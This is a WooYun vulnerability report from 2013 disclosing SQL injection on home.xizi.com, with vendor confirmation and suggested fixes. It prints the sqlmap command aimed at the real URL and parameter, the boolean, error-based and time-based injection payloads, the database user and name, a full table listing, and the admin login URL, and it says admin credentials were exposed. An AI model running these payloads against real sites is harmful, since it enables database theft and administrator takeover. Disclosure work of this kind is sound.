当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045286

漏洞标题:西子湖畔#某分站存在SQL注射导致信息泄露

相关厂商:bbs.xizi.com

漏洞作者: Mr.leo

提交时间:2013-12-17 17:40

修复时间:2014-01-31 17:41

公开时间:2014-01-31 17:41

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-17: 细节已通知厂商并且等待厂商处理中
2013-12-17: 厂商已经确认,细节仅向厂商公开
2013-12-27: 细节向核心白帽子及相关领域专家公开
2014-01-06: 细节向普通白帽子公开
2014-01-16: 细节向实习白帽子公开
2014-01-31: 细节向公众公开

简要描述:

西子湖畔#某分站存在SQL注射导致信息泄露

详细说明:

站点:
http://home.xizi.com
2个参数存在sql注射,case_id和typeid 以typeid为例
sqlmap.py -u "http://home.xizi.com/index.php?a=lists_type&c=index&m=content&typeid=63" -p "typeid" --dbs --current-user --current-db
sqlmap跑起
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: typeid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a=lists_type&c=index&m=content&typeid=63 AND 2469=2469
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: a=lists_type&c=index&m=content&typeid=63 AND (SELECT 1399 FROM(SELE
CT COUNT(*),CONCAT(0x3a6c75743a,(SELECT (CASE WHEN (1399=1399) THEN 1 ELSE 0 END
)),0x3a786a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=lists_type&c=index&m=content&typeid=63 AND SLEEP(5)
---
[09:05:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[09:05:33] [INFO] fetching current user
[09:05:33] [INFO] resumed: [email protected]%
current user: '[email protected]%'
[09:05:33] [INFO] fetching current database
[09:05:33] [INFO] resumed: home2013
current database: 'home2013'
[09:05:33] [INFO] fetching database names
[09:05:33] [INFO] the SQL query used returns 2 entries
[09:05:33] [INFO] resumed: information_schema
[09:05:33] [INFO] resumed: home2013
available databases [2]:
[*] home2013
[*] information_schema
Database: home2013
[136 tables]
+--------------------------+
| v9_activity_data |
| v9_activity_subject |
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_bid |
| v9_bid_log |
| v9_bid_relationship |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_case |
| v9_casepic |
| v9_category |
| v9_category_priv |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_setting |
| v9_comment_table |
| v9_company |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_extend_setting |
| v9_favorite |
| v9_hits |
| v9_ipbanned |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_convert_detail |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_data |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201105 |
| v9_poster_201106 |
| v9_poster_201107 |
| v9_poster_201108 |
| v9_poster_201109 |
| v9_poster_201112 |
| v9_poster_201201 |
| v9_poster_201202 |
| v9_poster_201203 |
| v9_poster_201204 |
| v9_poster_201205 |
| v9_poster_201206 |
| v9_poster_201207 |
| v9_poster_201208 |
| v9_poster_201209 |
| v9_poster_201210 |
| v9_poster_201211 |
| v9_poster_201212 |
| v9_poster_201301 |
| v9_poster_201302 |
| v9_poster_201303 |
| v9_poster_201305 |
| v9_poster_201306 |
| v9_poster_201307 |
| v9_poster_201308 |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201312 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_state |
| v9_tag |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_xz_data_record |
萝卜

123.png


管理员用户名密码侧漏

456.png


over
后台地址也简单了吧?
http://home.xizi.com/index.php?m=admin&c=index&a=login&pc_hash=

漏洞证明:

Database: home2013
[136 tables]
+--------------------------+
| v9_activity_data |
| v9_activity_subject |
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_bid |
| v9_bid_log |
| v9_bid_relationship |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_case |
| v9_casepic |
| v9_category |
| v9_category_priv |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_setting |
| v9_comment_table |
| v9_company |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_extend_setting |
| v9_favorite |
| v9_hits |
| v9_ipbanned |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_convert_detail |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_data |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201105 |
| v9_poster_201106 |
| v9_poster_201107 |
| v9_poster_201108 |
| v9_poster_201109 |
| v9_poster_201112 |
| v9_poster_201201 |
| v9_poster_201202 |
| v9_poster_201203 |
| v9_poster_201204 |
| v9_poster_201205 |
| v9_poster_201206 |
| v9_poster_201207 |
| v9_poster_201208 |
| v9_poster_201209 |
| v9_poster_201210 |
| v9_poster_201211 |
| v9_poster_201212 |
| v9_poster_201301 |
| v9_poster_201302 |
| v9_poster_201303 |
| v9_poster_201305 |
| v9_poster_201306 |
| v9_poster_201307 |
| v9_poster_201308 |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201312 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_state |
| v9_tag |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_xz_data_record |
+--------------------------+
后台地址也简单了吧?

678.png

修复方案:

1#修复一切可能的注入参数
2#屏蔽对外管理后台

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-12-17 17:47

厂商回复:

已确认,正在修复中~

最新状态:

暂无